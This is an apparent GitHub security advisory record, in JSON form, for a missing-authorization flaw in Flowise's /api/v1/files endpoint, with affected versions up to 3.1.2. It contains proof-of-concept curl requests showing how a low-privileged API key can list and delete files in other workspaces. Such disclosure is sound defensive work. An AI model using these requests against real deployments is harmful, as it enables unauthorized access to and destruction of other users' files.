{"id":"GHSA-wp74-f5hh-5f3r","summary":"Flowise: Missing authorization on `/api/v1/files` allows low-privileged API keys to list and delete files across workspaces within the same organization","details":"# summary:\nIn Flowise, the `/api/v1/files` route is protected only by the `feat:files` feature gate and does not enforce `checkPermission(...)` on either `GET` or `DELETE`. As a result, any authenticated API key within the organization, even one with unrelated permissions, can list and delete files belonging to other workspaces in the same organization.\n\n# details:\nThe `/files` route is mounted with `IdentityManager.checkFeatureByPlan('feat:files')` only and has no additional permission middleware. In the controller:\n\n- `getAllFiles` uses only `req.user.activeOrganizationId` and calls `getFilesListFromStorage(activeOrganizationId)`, which recursively lists files under the organization storage root\n- `deleteFile` reads `activeWorkspaceId`, but only uses it for storage quota bookkeeping; the actual deletion is performed using `activeOrganizationId + user-controlled path`\n\nAs a result, the API key’s `permissions` and `activeWorkspaceId` are not used to restrict file access.  \nIn the local test environment,an API key bound to workspace `1592b32a-a11b-4996-80b6-e1c4c2969d88` with only `[\"tools:view\"]` was created, then successfully:\n\n- called `GET /api/v1/files` and received `200 OK`\n- listed a test file stored under a different workspace, `f92a9a4d-392e-4db2-af82-d14e1d553446`\n- called `DELETE /api/v1/files?path=f92a9a4d-392e-4db2-af82-d14e1d553446/poc-cross-workspace.txt` and received `200 OK`\n- confirmed the file was removed by re-querying the file list\n\n# impact:\nAny low-privileged API key holder within the same organization can list and delete files from other workspaces without any file-specific permission. This breaks workspace isolation inside the organization and can lead to unauthorized file access and destructive tampering.\n\n# reproduction steps:\n\n1. Log in as a user who can create API keys, and create a key with only an unrelated permission, for example:\n\n```bash\ncurl -i -b tamako.cookie \\\n  -H 'x-request-from: internal' \\\n  -H 'Content-Type: application/json' \\\n  -d '{\"keyName\":\"poc-files-noperm\",\"permissions\":[\"tools:view\"]}' \\\n  http://localhost:8080/api/v1/apikey\n```\n\n2. Record the returned API key. In my local test, the key was:\n\n- `ykT6h4Q-u2PZDJmy2kMLWWKL_N42u8mHfYSvHC5Ja0E`\n\n3. Prepare a test file under a different workspace within the same organization, for example:\n\n- `f92a9a4d-392e-4db2-af82-d14e1d553446/poc-cross-workspace.txt`\n\n4. Use the low-privileged API key to list files:\n\n```bash\ncurl -i \\\n  -H 'Authorization: Bearer ykT6h4Q-u2PZDJmy2kMLWWKL_N42u8mHfYSvHC5Ja0E' \\\n  http://localhost:8080/api/v1/files\n```\n\n5. Observe a `200 OK` response that includes a file from another workspace, for example:\n\n```json\n[{\"name\":\"poc-cross-workspace.txt\",\"path\":\"f92a9a4d-392e-4db2-af82-d14e1d553446/poc-cross-workspace.txt\",\"size\":19}]\n```\n\n6. Use the same API key to delete that file:\n\n```bash\ncurl -i -X DELETE --get \\\n  -H 'Authorization: Bearer ykT6h4Q-u2PZDJmy2kMLWWKL_N42u8mHfYSvHC5Ja0E' \\\n  --data-urlencode 'path=f92a9a4d-392e-4db2-af82-d14e1d553446/poc-cross-workspace.txt' \\\n  http://localhost:8080/api/v1/files\n```\n\n7. Observe a `200 OK` response:\n\n```json\n{\"message\":\"file_deleted\"}\n```\n\n8. Call `GET /api/v1/files` again and confirm that the file is no longer present.","aliases":["CVE-2026-69252"],"modified":"2026-08-04T15:11:01.212085Z","published":"2026-08-04T14:54:03Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-08-04T14:54:03Z","nvd_published_at":null,"cwe_ids":["CWE-862"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-wp74-f5hh-5f3r"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/pull/6435"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/commit/bc22bf8baec95b6a3d6e1b3563b4f03491cd6fbb"},{"type":"PACKAGE","url":"https://github.com/FlowiseAI/Flowise"},{"type":"WEB","url":"https://github.com/FlowiseAI/Flowise/releases/tag/flowise@3.1.3"}],"affected":[{"package":{"name":"flowise","ecosystem":"npm","purl":"pkg:npm/flowise"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.1.3"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.1.2","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/08/GHSA-wp74-f5hh-5f3r/GHSA-wp74-f5hh-5f3r.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N"}]}